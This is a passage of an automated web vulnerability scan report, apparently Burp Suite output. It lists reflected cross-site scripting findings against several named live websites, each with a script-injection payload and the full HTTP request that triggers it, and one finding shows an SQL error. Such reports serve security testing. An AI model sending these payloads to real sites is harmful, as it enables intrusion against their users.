3.111. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1666f"><script>alert(1)</script>c233875c8f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?1666f"><script>alert(1)</script>c233875c8f4=1 HTTP/1.1 Host: www.barracudanetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.112. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe9f"><script>alert(1)</script>f4cf3321ed5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/?L=en&dbe9f"><script>alert(1)</script>f4cf3321ed5=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/purchase/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.1.10.1303306562
3.113. http://www.barracudanetworks.com/ns/company/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/company/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d81"><script>alert(1)</script>d58425295a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/company/?44d81"><script>alert(1)</script>d58425295a3=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/?L=en User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.2.10.1303306562
3.114. http://www.barracudanetworks.com/ns/products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d50"><script>alert(1)</script>49c5ce14246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/?89d50"><script>alert(1)</script>49c5ce14246=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/company/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.3.10.1303306562
3.115. http://www.barracudanetworks.com/ns/products/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/products/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464b5"><script>alert(1)</script>9af30aa4e31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/index.php?464b5"><script>alert(1)</script>9af30aa4e31=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303243982.1303304004.3; __utmc=91832325; __utmb=91832325.1.10.1303304004
3.116. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cc91"><script>alert(1)</script>38b325e3a40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/purewire_web_security_service_overview.php?5cc91"><script>alert(1)</script>38b325e3a40=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; barra_hidden_menus=a%3A0%3A%7B%7D; __utma=91832325.187649019.1303169116.1303169116.1303243982.2
3.117. http://www.barracudanetworks.com/ns/products/spam_overview.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/products/spam_overview.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2964"><script>alert(1)</script>027de165552 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/spam_overview.php?f2964"><script>alert(1)</script>027de165552=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.4.10.1303306562
3.118. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/products/web-site-firewall-overview.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a4ca"><script>alert(1)</script>921665f2e0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/web-site-firewall-overview.php?6a4ca"><script>alert(1)</script>921665f2e0e=1 HTTP/1.1 Host: www.barracudanetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.119. http://www.barracudanetworks.com/ns/purchase/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/purchase/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af309"><script>alert(1)</script>c537b15be43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/purchase/?af309"><script>alert(1)</script>c537b15be43=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(0x21)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304004.1303304208.4; __utmc=91832325
3.120. https://www.barracudanetworks.com/ns/products/request_eval_unit.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.barracudanetworks.com
Path:
/ns/products/request_eval_unit.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4837a"><script>alert(1)</script>92c292c0144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/request_eval_unit.php?products=BWB&4837a"><script>alert(1)</script>92c292c0144=1 HTTP/1.1 Host: www.barracudanetworks.com Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/index.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303243982.1303304004.3; __utmc=91832325; __utmb=91832325.2.10.1303304004
Response
HTTP/1.1 200 OK Content-Type: text/html Date: Wed, 20 Apr 2011 12:55:39 GMT Connection: close
3.121. http://www.bizfind.us/Index.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bizfind.us
Path:
/Index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 860e5"><script>alert(1)</script>e2c342ae66f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Index.asp??860e5"><script>alert(1)</script>e2c342ae66f=1 HTTP/1.1 Referer: http://www.bizfind.us/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.bizfind.us Cookie: ASPSESSIONIDSABCCQDR=OAGGLIGCEHCIFDFPOAKHADBM Accept-Encoding: gzip, deflate
3.122. http://www.bizfind.us/impressum.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bizfind.us
Path:
/impressum.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2791"><script>alert(1)</script>1e614f1c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /impressum.asp?e2791"><script>alert(1)</script>1e614f1c6c=1 HTTP/1.1 Referer: http://www.bizfind.us/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.bizfind.us Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI Accept-Encoding: gzip, deflate
3.123. http://www.bizfind.us/privacy.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bizfind.us
Path:
/privacy.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92c7f"><script>alert(1)</script>d295bc8863c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /privacy.asp?92c7f"><script>alert(1)</script>d295bc8863c=1 HTTP/1.1 Referer: http://www.bizfind.us/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.bizfind.us Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI Accept-Encoding: gzip, deflate
3.124. http://www.bizfind.us/pubblicita.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bizfind.us
Path:
/pubblicita.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40415"><script>alert(1)</script>ca47b0c9abe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pubblicita.asp?40415"><script>alert(1)</script>ca47b0c9abe=1 HTTP/1.1 Referer: http://www.bizfind.us/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.bizfind.us Cookie: ASPSESSIONIDSABCCQDR=OAGGLIGCEHCIFDFPOAKHADBM Accept-Encoding: gzip, deflate
The value of the cerca request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d443e"><script>alert(1)</script>304c9412ab6 was submitted in the cerca parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.asp?cerca=searchd443e"><script>alert(1)</script>304c9412ab6&cerco=ragionesociale&cosa=&dove=&pg=1&tipo=1 HTTP/1.1 Referer: http://www.bizfind.us/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.bizfind.us Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI Accept-Encoding: gzip, deflate
The value of the cerco request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3da6"><script>alert(1)</script>5a3ce2ded49 was submitted in the cerco parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.asp?cerca=search&cerco=ragionesocialee3da6"><script>alert(1)</script>5a3ce2ded49&cosa=&dove=&pg=1&tipo=1 HTTP/1.1 Referer: http://www.bizfind.us/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.bizfind.us Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI Accept-Encoding: gzip, deflate
3.127. http://www.bizfind.us/sitemap.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bizfind.us
Path:
/sitemap.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb41"><script>alert(1)</script>38e48083f60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap.asp?bcb41"><script>alert(1)</script>38e48083f60=1 HTTP/1.1 Referer: http://www.bizfind.us/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.bizfind.us Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI Accept-Encoding: gzip, deflate
3.128. http://www.briangardner.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.briangardner.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac42f"><script>alert(1)</script>1386c9e13ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ac42f\"><script>alert(1)</script>1386c9e13ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ac42f"><script>alert(1)</script>1386c9e13ba=1 HTTP/1.1 Host: www.briangardner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 488fd"><script>alert(1)</script>c1abdd6385b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload c2ee1><script>alert(1)</script>110769be82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 56330><script>alert(1)</script>08e5f3c2de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb52"><script>alert(1)</script>edd60039baf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 9e098><script>alert(1)</script>990afe4d813 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc62f"><script>alert(1)</script>df827601767 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d36"><script>alert(1)</script>71b3edd8e0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82b4a"><script>alert(1)</script>5a166ca3e9b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ebed"><script>alert(1)</script>9fb83843369 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6583"><script>alert(1)</script>83968344e4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c944c"><script>alert(1)</script>c1f9a991763 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 61f95<a>a0264480a25 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
1054: Unknown column '5265261f95' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image FROM image WHERE image_id = 5265261f95<a>a0264480a25</textarea> Warning: mysql_num_ ...[SNIP]...
3.141. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.caribbean-ocean.com
Path:
/get-image.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5489f<a>e321fa70c32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload fb1ab><script>alert(1)</script>d76d00b9711 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f49f4"><script>alert(1)</script>426e31d6add was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 5bcea><script>alert(1)</script>e29d7a87e54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4754c"><script>alert(1)</script>177af1120f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload e6e76><script>alert(1)</script>0808859b3b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 331fa"><script>alert(1)</script>5e831a0ec97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ea5"><script>alert(1)</script>ca4cb90b998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299cc"><script>alert(1)</script>2a8489d5ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70dbc"><script>alert(1)</script>c0d8ae38156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba93"><script>alert(1)</script>ee22e77bfa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 184fe"><script>alert(1)</script>67eb97766fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f595"><script>alert(1)</script>67a759c718b was submitted in the REST URL parameter 4. This input was echoed as 5f595\"><script>alert(1)</script>67a759c718b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/07/20/managing-your-security-career5f595"><script>alert(1)</script>67a759c718b/ HTTP/1.1 Host: www.digitalbond.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e96"><script>alert(1)</script>5199d6c8bfe was submitted in the REST URL parameter 1. This input was echoed as 68e96\"><script>alert(1)</script>5199d6c8bfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
